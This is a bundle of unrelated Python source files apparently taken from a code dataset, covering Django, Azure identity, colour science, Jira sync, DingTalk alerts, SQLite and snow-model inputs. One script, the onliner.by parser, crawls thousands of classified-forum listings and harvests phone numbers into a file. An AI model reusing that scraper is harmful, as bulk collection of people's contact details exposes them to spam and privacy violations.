numberCorrect/len(testingImages)\n\n\nprint(getAccuracy(cnn))\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"506027669","text":"import sys, requests, re\nfrom lxml import etree\n\ntemp = []\n#парсим предложения специалистов по отделке и ремонту\nurl = \"http://baraholka.onliner.by/viewforum.php?f=597&start=\"\nstart = 0\n\nwhile start <= 11000:\n res = requests.get(url + str(start))\n parser = etree.HTMLParser()\n root = etree.fromstring(res.text, parser)\n for element in root.iter(\"a\"):\n pattern = \"(\\/viewtopic.php\\?t=\\d+)\"\n tmp = re.findall(pattern, str(element.attrib))\n if tmp:\n string = \"http://baraholka.onliner.by\" + str(tmp[0])\n if string not in temp:\n print(string)\n temp.append(string)\n\n start += 50\n \n\nphones = []\nwith open(\"tt.txt\", \"a\") as file:\n for link in temp:\n print('link >> ', link)\n res1 = requests.get(link)\n pattern1 = \"\\+\\s?375\\s?\\({0,1}\\d{2}\\)?\\s?-?\\d{3}-?\\s?\\d{2}-?\\s?\\d{2}\"\n tmp2 = re.findall(pattern1, res1.text)\n if tmp2:\n for elem in tmp2:\n if elem not in phones:\n phones.append(elem) \n file.write(elem + '\\n')\n # print(tmp2)\n \n pattern2 = \"\\(\\d{3}\\)\\s?\\d{3}-\\d{2}-\\d{2}\"\n tmp3 = re.findall(pattern2, res1.text)\n if tmp3:\n for elem in tmp3:\n if elem not in phones:\n phones.append(elem)\n file.write(elem)\n # print(tmp3)\n \n pattern3 = \"8-?\\s?\\d{3}-?\\s?\\d{3}-?\\d{2}-?\\d{2}\"\n tmp4 = re.findall(pattern3, res1.text)\n if tmp4:\n for elem in tmp4:\n if elem not in phones:\n phones.append(elem)\n file.write(elem)\n # print(tmp4)\n \n pattern4 = \"029\\s?-?\\d{3}-?\\s?\\d{2}\\s?-?\\d{2}\"\n tmp5 = re.findall(pattern4, res1.text)\n if tmp5:\n for elem in tmp5:\n if elem not in phones:\n phones.append(elem)\n file.write(elem)\n # print(tmp5)\n \n# print(phones)\n","sub_path":"onliner.by-barakholka-parser.py","file_name":"onliner.by-barakholka-parser.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"550817647","text":"# imports\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\nfrom django.core import management\nfrom songs.models import *\nimport json\nimport datetime\nimport os\n# End: imports -----------------------------------------------------------------\n\n\nclass Command(BaseCommand):\n\n def db_to_txt(self):\n songs = Song.objects.all()\n\n name = input(\"Name the exported file: \")\n name += \"_lines-{}\".format(len(songs))\n name += \"_date-{:%d-%m-%y}\".format(datetime.datetime.now())\n if not name.endswith(\".txt\"):\n name += \".txt\"\n\n data = \"\"\n for song in songs:\n tags = song.tags.values_list('name')\n tags = [t[0] for t in tags]\n song = song.__dict__\n song = {'tittel': song['tittel'], 'artist': song['artist'], 'bpm': song['bpm'], 'tags': tags, 'spotify_URL': song['spotify_URL'], 'spotify_URI': song['spotify_URI'] }\n data += json.dumps(song, ensure_ascii=False) + \"\\n\"\n\n with open('songs/static/songs/private_files' + name, mode=\"w+\", encoding=\"UTF-8\") as file:\n file.write(data)\n\n\n def handle(self, *args, **options):\n self.db_to_txt()\n print(\"Done\")\n # End of handle\n","sub_path":"songs/management/commands/export_songs.py","file_name":"export_songs.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"319845747","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom .aad_client import AadClient\nfrom .aad_client_base import AadClientBase\nfrom .auth_code_redirect_handler import AuthCodeRedirectServer\nfrom .exception_wrapper import wrap_exceptions\nfrom .msal_credentials import ConfidentialClientCredential, PublicClientCredential\nfrom .msal_transport_adapter import MsalTransportAdapter, MsalTransportResponse\n\n\ndef _scopes_to_resource(*scopes):\n \"\"\"Convert an AADv2 scope to an AADv1 resource\"\"\"\n\n if len(scopes) != 1:\n raise ValueError(\"This credential supports only one scope per token request\")\n\n resource = scopes[0]\n if resource.endswith(\"/.default\"):\n resource = resource[: -len(\"/.default\")]\n\n return resource\n\n\n__all__ = [\n \"AadClient\",\n \"AadClientBase\",\n \"AuthCodeRedirectServer\",\n \"ConfidentialClientCredential\",\n \"MsalTransportAdapter\",\n \"MsalTransportResponse\",\n \"PublicClientCredential\",\n \"wrap_exceptions\",\n]\n","sub_path":"sdk/identity/azure-identity/azure/identity/_internal/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"166455894","text":"# -*- coding: utf-8 -*-\n\"\"\"\nShowcases *yellowness* computations.\n\"\"\"\n\nimport numpy as np\n\nimport colour\nfrom colour.utilities import message_box\n\nmessage_box('\"Yellowness\" Computations')\n\nXYZ = np.array([95.00000000, 100.00000000, 105.00000000])\nmessage_box(\n ('Computing \"yellowness\" using \"ASTM D1925\" method for '\n 'given sample \"CIE XYZ\" tristimulus values:\\n'\n '\\n\\t{0}\\n\\n'\n 'Warning: The input domain of that definition is non standard!'.format(\n XYZ)))\nprint(colour.yellowness(XYZ=XYZ, method='ASTM D1925'))\nprint(colour.colorimetry.yellowness_ASTMD1925(XYZ))\n\nprint('\\n')\n\nmessage_box(\n ('Computing \"yellowness\" using \"ASTM E313\" method for '\n 'given sample \"CIE XYZ\" tristimulus values:\\n'\n '\\n\\t{0}\\n\\n'\n 'Warning: The input domain of that definition is non standard!'.format(\n XYZ)))\nprint(colour.yellowness(XYZ=XYZ, method='ASTM E313'))\nprint(colour.colorimetry.yellowness_ASTME313(XYZ))\n","sub_path":"colour/examples/colorimetry/examples_yellowness.py","file_name":"examples_yellowness.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"579511123","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom pymongo import MongoClient\r\nfrom wordcloud import WordCloud, STOPWORDS\r\n\r\nconnection = MongoClient(\"mongodb://localhost:27018/\")\r\ndatabase = connection.StackOverFlowData\r\ncollection = database.Tags\r\n\r\ncomment_words = ''\r\nstopwords = set(STOPWORDS)\r\n\r\ndf = pd.DataFrame(list(collection.find()))\r\ndf['Id'] = df['Id'].apply(lambda x: int(x))\r\ndf['Count'] = df['Count'].apply(lambda x: int(x))\r\ndf.drop('_id', axis=1, inplace=True)\r\ndf.set_index('Id', inplace=True)\r\ndf.sort_values(by=['Count'], ascending=False, inplace=True)\r\nfinalLst = list(df['TagName'])\r\n\r\nfor val in finalLst:\r\n comment_words += \" \"\r\n comment_words += val\r\n comment_words += \" \"\r\n\r\nwordCloud = WordCloud(width=800, height=800, background_color='white', stopwords=stopwords, min_font_size=10).generate(comment_words)\r\nplt.figure(figsize=(8, 8), facecolor=None)\r\nplt.imshow(wordCloud)\r\nplt.axis(\"off\")\r\nplt.tight_layout(pad=0)\r\nplt.show()","sub_path":"Task-3/Part B/task3WordCloud.py","file_name":"task3WordCloud.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552549858","text":"import json\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nimport requests\nimport vault_auth\nfrom git import Repo\nfrom ldap3 import SUBTREE, Connection\nfrom requests.auth import HTTPBasicAuth\n\nPI_SLUG = \"Project Information\"\nnesting_level = 0\n\n\ndef get_vault_secret(user_id):\n secret = vault_auth.get_secret(\n user_id,\n iam_role=\"vault_jira_project_updater\",\n url=\"https://login.linaro.org:8200\"\n )\n return secret[\"data\"][\"pw\"]\n\n\ndef initialise_ldap():\n username = \"cn=bamboo-bind,ou=binders,dc=linaro,dc=org\"\n password = get_vault_secret(\"secret/ldap/{}\".format(username))\n return Connection(\n 'ldaps://login.linaro.org',\n user=username,\n password=password,\n auto_bind=True\n )\n\n\ndef initialise_auth():\n username = \"it.support.bot\"\n password = get_vault_secret(\"secret/ldap/{}\".format(username))\n return HTTPBasicAuth(username, password)\n\n\ndef jira_get(url, jira_auth):\n headers = {'content-type': 'application/json'}\n try:\n response = requests.get(\n \"https://projects.linaro.org/%s\" % url,\n headers=headers, auth=jira_auth)\n if response.status_code != 200:\n print(\"Getting %s failed with code %s\" % (url, response.status_code))\n sys.exit(1)\n return response.json()\n except Exception as e:\n print(\"While fetching %s, got exception: %s\" % (url, str(e)))\n sys.exit(1)\n\n\ndef get_all_projects(jira_auth):\n return jira_get(\"rest/api/2/project\", jira_auth)\n\n\ndef meta_value(meta_data, key, group=\"Project Visibility\"):\n for m in meta_data:\n if m[\"key\"] == key and m[\"group\"] == group:\n return m[\"value\"]\n return \"\"\n\n\ndef get_metadata(jira_projects, jira_auth):\n # Iterate through the projects, looking for projects\n # that have got metadata defined.\n meta_results = {}\n for p in jira_projects:\n meta = jira_get(\n \"rest/metadata/latest/project/%s?includeHidden=true\" % p[\"key\"], jira_auth)\n # Only include projects thare are active, open and published\n if meta != []:\n pv_open = meta_value(meta, \"Open\")\n pv_active = meta_value(meta, \"Active\")\n pv_published = meta_value(meta, \"Published\")\n pv_visibility = meta_value(meta, \"property_visibility\", \"system\")\n if pv_open == \"Yes\" and pv_active == \"Yes\" and pv_published == \"Yes\" and pv_visibility != \"\":\n meta_results[p[\"key\"]] = meta\n else:\n print(\"Ignoring %s - open='%s', active='%s', published='%s', visibility='%s'\" % (\n p[\"key\"], pv_open, pv_active, pv_published, pv_visibility))\n else:\n print(\"Ignoring %s - no metadata\" % p[\"key\"])\n return meta_results\n\n\ndef get_specific_projects(metadata, jira_auth):\n results = []\n for key in metadata.keys():\n project = jira_get(\n \"rest/api/2/project/%s\" % key, jira_auth)\n results.append(project)\n return results\n\n\ndef lookup_email(email):\n # Try to get a display name back for the given email address.\n with initialise_ldap() as ldap_conn:\n if ldap_conn.search(\n \"dc=linaro,dc=org\",\n search_filter=\"(mail=%s)\" % email,\n search_scope=SUBTREE,\n attributes=[\"displayName\"]):\n return ldap_conn.entries[0].displayName.value\n return None\n\n\ndef htmlise_email(email):\n # If the email address ends with a full-stop, remove it\n # before wrapping tags around and then add it back\n # afterwards.\n if email[-1] == \".\":\n got_fullstop = True\n email = email[:-1]\n else:\n got_fullstop = False\n name = lookup_email(email)\n if name is None:\n result = \"%s\" % (email, email)\n else:\n result = \"%s \" % (name, email)\n if got_fullstop:\n result += \".\"\n return result\n\n\ndef htmlise_markdown(url):\n # Split on the |\n parts = url.split(\"|\")\n if len(parts) != 2:\n sys.exit(\"'%s' looks like markdown but isn't.\" % url)\n part1 = parts[0][1:]\n part2 = parts[1][:-1]\n return \"%s\" % (part2, part1)\n \n\ndef htmlise_url(url):\n # Does the URL look like markdown?\n if url[0] == \"[\":\n return htmlise_markdown(url)\n # If the url ends with a full-stop, remove it\n # before wrapping tags around and then add it back\n # afterwards.\n if url[-1] == \".\":\n got_fullstop = True\n url = url[:-1]\n else:\n got_fullstop = False\n result = \"%s\" % (url, url)\n if got_fullstop:\n result += \".\"\n return result\n\n\ndef find_markers(line, known_point, start_char, end_char, make_sane=True):\n start = line.rfind(start_char, 0, known_point)\n end = line.find(end_char, known_point)\n if make_sane:\n # Ensure that start & end either point at the start and\n # end of the entire string, or at the desired substring.\n if start == -1:\n start = 0\n else:\n # Point at the next char\n start += 1\n if end == -1:\n end = len(line)\n return start, end\n\n\ndef process_email(at_pos, line, result):\n start, end = find_markers(line, at_pos, \" \", \" \")\n # Now extract anything before 'start'\n if start != 0:\n result += line[:start]\n # Extract the email address\n addr = line[start:end]\n # and then remove that from the line.\n line = line[end:]\n result += htmlise_email(addr)\n return line, result\n\n\ndef process_url(url_pos, line, result):\n # This is slightly complicated by the fact that\n # we need to support Jira link markdown which\n # can support spaces in the readable text, so\n # we look for '[' first.\n start, end = find_markers(line, url_pos, \"[\", \"]\", make_sane=False)\n if start == -1 or end == -1:\n # Need to have both [ and ] to qualify for Jira link\n # markdown processing.\n start, end = find_markers(line, url_pos, \" \", \" \")\n # Now extract anything before 'start'\n if start != 0:\n result += line[:start]\n # Extract the url address - slicing doesn't\n # include the last character hence the +1\n addr = line[start:end+1]\n # and then remove that from the line.\n line = line[end+1:]\n result += htmlise_url(addr)\n return line, result\n\n\ndef htmlise_unordered_list(line):\n global nesting_level\n # Before we do anything else, if the current nesting\n # level is non-zero, close off the previous list entry.\n result = \"\"\n if nesting_level != 0:\n result = \"\"\n # How many stars are there? We split on the first space\n # which should come after all of the stars.\n parts = line.split(\" \", 1)\n # We know that the first character is *, so we'll assume\n # that everything up to the space is also * and that is\n # our nesting level.\n level = len(parts[0])\n if nesting_level < level:\n # Start a new list\n result += \"
    \"\n elif nesting_level > level:\n # End the previous list. Note that we DON'T append this\n # (unlike starting a new list) because HTML requires\n # the list to end before the list entry is ended.\n result = \"
\"\n # Now start this list entry\n result += \"
  • \"\n nesting_level = level\n return result + \" \" + htmlise_non_list_line(parts[1])\n\n\ndef htmlise_non_list_line(line):\n result = \"\"\n while True:\n at_pos = line.find(\"@\")\n url_pos = line.find(\"://\")\n # If no markers, return what is left\n if at_pos == -1 and url_pos == -1:\n return result+line\n if at_pos != -1 and url_pos != -1:\n # Which comes first?\n if at_pos < url_pos:\n line, result = process_email(at_pos, line, result)\n else:\n line, result = process_url(url_pos, line, result)\n elif at_pos != -1:\n line, result = process_email(at_pos, line, result)\n else:\n line, result = process_url(url_pos, line, result)\n\n\ndef htmlise_line(line):\n global nesting_level\n result = \"\"\n\n if line == \"\":\n return \"\"\n elif line[0] == \"*\":\n # If the line is part of an unordered list, process the list\n # part first and then process the rest of the line.\n return htmlise_unordered_list(line)\n elif nesting_level != 0:\n # We've got a non-list line and the nesting level is\n # non-zero, so decrement the nesting level and close off\n # a list.\n nesting_level -= 1\n result = \"
  • \"\n return result + htmlise_non_list_line(line)\n\n\n\ndef htmlise_value(value):\n global nesting_level\n # The nesting level should already be zero because we\n # decrement it as the list ends but just in case ...\n nesting_level = 0\n\n # Break the value into lines. If there is only one\n # line then just process it straight away. Otherwise\n # HTMLise each line then add \"
    \" to the end of\n # all except the last one.\n parts = value.split(\"\\n\")\n if len(parts) == 1:\n return htmlise_line(value.strip(\"\\r\"))\n\n result = \"\"\n for p in parts:\n if result != \"\" and nesting_level == 0:\n result += \"
    \"\n result += htmlise_line(p.strip(\"\\r\"))\n\n # Make sure we don't have an open list\n while nesting_level != 0:\n result += \"\"\n nesting_level -= 1\n return result\n\n\ndef construct_project_data(projects, metadata):\n results = []\n for p in projects:\n if p[\"key\"] in metadata:\n blob = construct_project_blob(p, metadata)\n results.append(blob)\n # Sort the projects by title\n results = sorted(results, key=lambda x: x[PI_SLUG][\"title\"])\n return {\n \"projects\": results\n }\n\n\ndef construct_project_blob(p, metadata):\n blob = {\n \"key\": p[\"key\"],\n \"icon\": p[\"avatarUrls\"][\"48x48\"]\n }\n meta = metadata[p[\"key\"]]\n property_list = meta_value(meta, \"property_visibility\", \"system\")\n properties = property_list.split(\"\\n\")\n # Now add the values\n for prop in properties:\n if \":\" in prop:\n parts = prop.split(\":\")\n value = meta_value(meta, parts[1], parts[0])\n if parts[0] not in blob:\n blob[parts[0]] = {}\n blob[parts[0]][parts[1]] = htmlise_value(value)\n # Finish off with the title and description from the project\n if PI_SLUG not in blob:\n blob[PI_SLUG] = {}\n blob[PI_SLUG][\"title\"] = htmlise_value(p[\"name\"])\n blob[PI_SLUG][\"description\"] = htmlise_value(p[\"description\"])\n return blob\n\ndef run_command(command):\n result = subprocess.run(\n command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if result.returncode != 0:\n print(\"ERROR: '%s'\" % command)\n print(result.stdout.decode(\"utf-8\"))\n print(result.stderr.decode(\"utf-8\"))\n sys.exit(1)\n\n\ndef run_git_command(command):\n # We do some funky stuff around the git command processing because we want\n # to keep the SSH key under tight control.\n # See https://stackoverflow.com/a/4565746/1233830\n\n # Fetch the SSH key from Vault and store it in a temporary file\n with tempfile.NamedTemporaryFile(mode='w+', delete=False) as pem_file:\n pem = get_vault_secret(\"secret/misc/linaro-build-github.pem\")\n pem_file.write(pem)\n pkf = pem_file.name\n\n git_cmd = 'ssh-add \"%s\"; %s' % (pkf, command)\n full_cmd = \"ssh-agent bash -c '%s'\" % git_cmd\n run_command(full_cmd)\n os.remove(pkf)\n\n\ndef get_repo():\n repo_dir = \"%s/website\" % os.getenv(\"GITHUB_WORKSPACE\")\n os.chdir(repo_dir)\n run_git_command(\"git checkout master\")\n return Repo(repo_dir)\n\n\ndef checkin_repo(repo):\n repo_dir = \"%s/website\" % os.getenv(\"GITHUB_WORKSPACE\")\n os.chdir(repo_dir)\n # Only use run_git_command when we need the SSH key involved.\n run_command(\"git add --all\")\n run_command(\"git commit -m \\\"Update project data\\\"\")\n run_git_command(\n \"git push --set-upstream origin %s\" % repo.active_branch.name)\n\n\ndef check_repo_status(repo):\n # Add any untracked files to the repository\n untracked_files = repo.untracked_files\n for f in untracked_files:\n repo.git.add(f)\n # See if we have changed anything\n if repo.is_dirty():\n print(\"Checking in git repository changes\")\n checkin_repo(repo)\n else:\n print(\"No changes made to the git repository\")\n\n\ndef do_the_git_bits(data):\n repo = get_repo()\n working_dir = os.getenv(\"GITHUB_WORKSPACE\")\n sync_project_pages(data, \"%s/website/_pages/projects\" % working_dir)\n with open(\n \"%s/website/_data/projects.json\" % working_dir,\n \"w\"\n ) as json_file:\n json.dump(\n data,\n json_file,\n indent=4,\n sort_keys=True\n )\n check_repo_status(repo)\n\n\ndef check_project_dir_exists(key, projects_directory):\n path = \"%s/%s\" % (projects_directory, key.lower())\n if os.path.isdir(path):\n return\n os.makedirs(path)\n with open(\"%s/posts.md\" % path, \"w\") as posts_file:\n posts_file.write(\"---\\n\")\n posts_file.write(\"title: %s project posts\\n\" % key)\n posts_file.write(\"permalink: /projects/%s/posts/\\n\" % key.lower())\n posts_file.write(\"layout: related_project_posts\\n\")\n posts_file.write(\"key: %s\\n\" % key)\n posts_file.write(\"---\\n\")\n\n\ndef sync_project_pages(project_data, projects_directory):\n # Below _pages/projects, there is a directory for each project (lower-case name) and,\n # within that, a file called \"posts.md\" with this structure:\n #\n # ---\n # title: AI Project Posts\n # permalink: /projects/ai/posts/\n # layout: related_project_posts\n # key: AI\n # ---\n projects = project_data[\"projects\"]\n project_keys_lower = []\n for p in projects:\n check_project_dir_exists(p[\"key\"], projects_directory)\n project_keys_lower.append(p[\"key\"].lower())\n #\n # Remove any directories that exist for projects that don't ...\n subdirs = [f.name for f in os.scandir(projects_directory) if f.is_dir()]\n for s in subdirs:\n if s not in project_keys_lower:\n shutil.rmtree(\"%s/%s\" % (projects_directory, s))\n\n\ndef main():\n jira_auth = initialise_auth()\n jira_projects = get_all_projects(jira_auth)\n if len(jira_projects) == 0:\n print(\"Failed to retrieve any projects from Jira\")\n sys.exit(1)\n jira_metadata = get_metadata(jira_projects, jira_auth)\n # There seems to be a bug in the Jira REST API where getting all\n # projects does not include the description so, now we have a list\n # of the projects with metadata, re-fetch the Jira project info.\n jira_projects = get_specific_projects(jira_metadata, jira_auth)\n project_data = construct_project_data(jira_projects, jira_metadata)\n do_the_git_bits(project_data)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"generate_project_json.py","file_name":"generate_project_json.py","file_ext":"py","file_size_in_byte":15087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533432586","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# 2019-7-3 Send Message to DingDing\n# Author: Deniss.wang\n\nimport sys\nimport json\nimport requests\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nops_dingdingd_token = '1'\naws_dingdingd_token = '2'\ndef SendMessage(msg):\n # AWS账单警报组钉钉机器人webhook\n aws_alert_url = 'https://oapi.dingtalk.com/robot/send?access_token=%s' % aws_dingdingd_token\n # OPS警报组钉钉机器人webhook\n ops_url = 'https://oapi.dingtalk.com/robot/send?access_token=%s' % ops_dingdingd_token\n HEADERS = {\n \"Content-Type\": \"application/json ;charset=utf-8 \"\n }\n message = \"%s \" % msg\n String_textMsg = { \\\n \"msgtype\": \"text\",\n \"text\": {\"content\": message},\n \"at\": {\n \"atMobiles\": [\n \"138\" #如果需要@某人,这里写他的手机号\n ],\n \"isAtAll\": 0 #如果需要@所有人,这些写1\n }\n }\n String_textMsg = json.dumps(String_textMsg)\n AWS_ALERT = requests.post(aws_alert_url, data=String_textMsg, headers=HEADERS)\n OPS_ALERT = requests.post(ops_url, data=String_textMsg, headers=HEADERS)\n print(AWS_ALERT.text,OPS_ALERT.text)\nif __name__ == '__main__':\n SendMessage(\"send dingding message\")\n","sub_path":"Python/DingDing.py","file_name":"DingDing.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490242755","text":"from sqlite3 import Error, connect\nfrom bot.config import DB\nfrom bot.logger import logger\n\n\ndef exc(method):\n def wrapped(*args, **kwargs):\n\n try:\n result = method(*args, **kwargs)\n\n except Error as e:\n result = None\n logger.warning(e)\n\n return result\n return wrapped\n\n\nclass DBConnector(object):\n @exc\n def __init__(self):\n conn = connect(DB)\n self.cur = conn.cursor()\n\n @exc\n def get_last_id(self, _table):\n \"\"\" get id of the last table element \"\"\"\n query = f'select id from {_table} order by rowid desc limit 1;'\n id_tuple = self.cur.execute(query).fetchone()\n last_id = 0 if id_tuple is None else id_tuple[0]\n return last_id\n\n @exc\n def get_count(self, _table):\n \"\"\" get the amount of a table elements \"\"\"\n query = f'select count(*) from {_table};'\n count_tuple = self.cur.execute(query).fetchone()\n count = 0 if count_tuple is None else count_tuple[0]\n return count\n\n @exc\n def get_likes_in_period(self, _table='likes'):\n \"\"\" get likes from all users for a set period of time \"\"\"\n query = f'select count(*) from {_table};'\n count_tuple = self.cur.execute(query).fetchone()\n count = 0 if count_tuple is None else count_tuple[0]\n return count\n\n @exc\n def get_user_ids(self):\n \"\"\" get user Ids without superusers \"\"\"\n query = f'select id from \"auth_user\" where \"is_superuser\"==false;'\n ids_tuple = self.cur.execute(query).fetchall()\n ids = []\n\n for item in ids_tuple:\n ids.append(item[0])\n\n return ids\n\n @exc\n def get_not_own_post_ids(self, uid):\n \"\"\" get other user's posts Ids \"\"\"\n query = f'select id from \"sn_post\" where \"author_id\"!={uid};'\n ids_tuple = self.cur.execute(query).fetchall()\n ids = []\n\n for item in ids_tuple:\n ids.append(item[0])\n\n return ids\n\n @exc\n def get_user_post_amount(self, uid):\n \"\"\" get the amount of user posts \"\"\"\n query = f'select id from \"sn_post\" where \"author_id\"={uid};'\n ids_tuple = self.cur.execute(query).fetchall()\n amount = 0 if ids_tuple is None else len(ids_tuple)\n return amount\n\n @exc\n def get_user_like_amount(self, uid):\n \"\"\" get the amount of user likes \"\"\"\n query = f'select id from \"sn_like\" where \"user_id\"={uid};'\n ids_tuple = self.cur.execute(query).fetchall()\n amount = 0 if ids_tuple is None else len(ids_tuple)\n return amount\n\n @exc\n def get_user_dislike_amount(self, uid):\n \"\"\" get the amount of user dislikes \"\"\"\n query = f'select id from \"sn_dislike\" where \"user_id\"={uid};'\n ids_tuple = self.cur.execute(query).fetchall()\n amount = 0 if ids_tuple is None else len(ids_tuple)\n return amount\n\n @exc\n def get_user_last_post(self, uid):\n \"\"\" get date of the last user post \"\"\"\n query = f'select pub_date from \"sn_post\" where \"author_id\"={uid} order by pub_date desc limit 1;'\n date_tuple = self.cur.execute(query).fetchone()\n _date = None if date_tuple is None else date_tuple[0]\n return _date\n\n def get_user_last_like(self, uid):\n \"\"\" get date of the last user like \"\"\"\n query = f'select date from \"sn_like\" where \"user_id\"={uid} order by date desc limit 1;'\n date_tuple = self.cur.execute(query).fetchone()\n _date = None if date_tuple is None else date_tuple[0]\n return _date\n\n\ndbc = DBConnector()\n\nif __name__ == '__main__':\n \"\"\" Debug \"\"\"\n for tbl in ['auth_user', 'sn_post', 'sn_like', 'sn_dislike']:\n print(f'\\nTABLE \"{tbl}\"')\n print(dbc.cur.execute(f'pragma table_info({tbl});').fetchall())\n print(dbc.cur.execute(f'select * from {tbl};').fetchall())\n\n \"\"\" Tests \"\"\"\n print('\\ntests')\n print(f'get_user_ids():\\t\\t{dbc.get_user_ids()}')\n user_id = 1\n print(f'user_id={user_id}\\tget_not_own_post_ids():\\t\\t\\t{dbc.get_not_own_post_ids(uid=user_id)}')\n print(f'user_id={user_id}\\tget_user_post_amount():\\t{dbc.get_user_post_amount(uid=user_id)}')\n print(f'user_id={user_id}\\tget_user_like_amount():\\t{dbc.get_user_like_amount(uid=user_id)}')\n print(f'get_count for table \"sn_like\":\\t{dbc.get_count(\"sn_like\")}')\n print(f'user_id={user_id}\\tget_user_last_post for table \"sn_post\":\\t{dbc.get_user_last_post(uid=user_id)}')\n user_id = 6\n print(f'user_id={user_id}\\tget_user_last_like for table \"sn_like\":\\t{dbc.get_user_last_like(uid=user_id)}')\n\n user_id_list = dbc.get_user_ids()\n for user_id in user_id_list:\n print(f'user_id={user_id}\\tget_user_like_amount():\\t{dbc.get_user_like_amount(uid=user_id)}')\n","sub_path":"bot/db_connector.py","file_name":"db_connector.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"289526013","text":"#!/usr/bin/env python3\n\n#import needed packages\nimport tkinter as tk\nimport platform\nimport os\n\n#class definition\nclass BotMeWarning:\n\t\"\"\"Class for the Warning before BotMe starts\n\t needed packages:\n\n\t\timport tkinter (as tk)\n\t\timport platform\n\t\timport os\n\n\t\"\"\"\n\n\t#constructor\n\tdef __init__(self, master):\n\t\t\"\"\"Initiates the interface given an instance of tkinters tk.Tk()\n\t\t does not return anything\"\"\"\n\n\t\tself.master = master\n\t\tmaster.title(\"Warning\")\n\n\t\tself.warningContent = tk.Label(self.master, text=\"\\nPlease read the BotMe_README.txt/Documentation for proper\\nuse of this bot!\\n\", width=60)\n\t\tself.warningContent.grid(row=0, column=0, columnspan=3)\n\t\tself.warningAccepted = tk.Button(self.master, text=\"Understood!\", command=self.BotMeExtended)\n\t\tself.warningAccepted.grid(row=1, column=1)\n\n\t\tmaster.protocol(\"WM_DELETE_WINDOW\", self.BotMeExtended)\n\n\t#functions\n\tdef BotMeExtended(self):\n\t\t\"\"\"Calls the bot in \"pyBots/BotMe/BotMe.py\" using the os module\n\t\t does not return anything\"\"\"\n\n\t\tself.master.destroy()\n\t\tif \"Windows\" in platform.system():\n\t\t\tos.system(\"python pyBots/BotMe/BotMe.py\")\n\t\telse:\n\t\t\tos.system(\"pyBots/BotMe/BotMe.py\")\n\n#init gui\ndef main():\n\tinfoWarning = tk.Tk()\n\tapp = BotMeWarning(infoWarning)\n\tinfoWarning.mainloop()\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"bin/system/warnings/BotMeW.py","file_name":"BotMeW.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633192966","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport netCDF4 as nc\nimport glob\nfrom copy import copy\nfrom spatialnc.proj import add_proj\n\nC_TO_K = 273.16\nFREEZE = C_TO_K\n# Kelvin to Celcius\nK_TO_C = lambda x: x - FREEZE\n\n\ndef open_files_nc(myawsm):\n \"\"\"\n Open the netCDF files for initial conditions and inputs\n - Reads in the initial_conditions file\n - Required variables are x,y,z,z_0\n - The others z_s, rho, T_s_0, T_s, h2o_sat, mask can be specified\n but will be set to default of 0's or 1's for mask\n - Open the files for the inputs and store the file identifier\n\n Args:\n myawsm: awsm class\n Returns:\n force: dictionary of opened netCDF forcing data files\n\n \"\"\"\n # -------------------------------------------------------------------------\n # get the forcing data and open the file\n force = {}\n force['thermal'] = nc.Dataset(os.path.join(myawsm.paths, 'thermal.nc'), 'r')\n force['air_temp'] = nc.Dataset(os.path.join(myawsm.paths, 'air_temp.nc'), 'r')\n force['vapor_pressure'] = nc.Dataset(os.path.join(myawsm.paths, 'vapor_pressure.nc'), 'r')\n force['wind_speed'] = nc.Dataset(os.path.join(myawsm.paths, 'wind_speed.nc'), 'r')\n force['net_solar'] = nc.Dataset(os.path.join(myawsm.paths, 'net_solar.nc'), 'r')\n\n # soil temp can either be distributed for set to a constant\n try:\n force['soil_temp'] = nc.Dataset(options['inputs']['soil_temp'], 'r')\n except:\n force['soil_temp'] = float(myawsm.soil_temp) * np.ones((myawsm.topo.ny,\n myawsm.topo.nx))\n\n force['precip_mass'] = nc.Dataset(os.path.join(myawsm.paths, 'precip.nc'), 'r')\n force['percent_snow'] = nc.Dataset(os.path.join(myawsm.paths, 'percent_snow.nc'), 'r')\n force['snow_density'] = nc.Dataset(os.path.join(myawsm.paths, 'snow_density.nc'), 'r')\n force['precip_temp'] = nc.Dataset(os.path.join(myawsm.paths, 'precip_temp.nc'), 'r')\n\n return force\n\n\ndef open_files_ipw(myawsm):\n \"\"\"\n Compile list of input data hours from ipw files stored in standard AWSM\n file structure. These are only list of integer water year hours, the actual\n reading of ipw files happens from the standard directory structure.\n\n Args:\n myawsm: awsm class\n\n Returns:\n ppt_list: list of hours for reference from the ppt_desc file\n input_list: list of input hours to read in from the data directory\n\n \"\"\"\n # ------------------------------------------------------------------------\n # get the forcing data and open the file\n # path to snow and em files\n path_inputs = 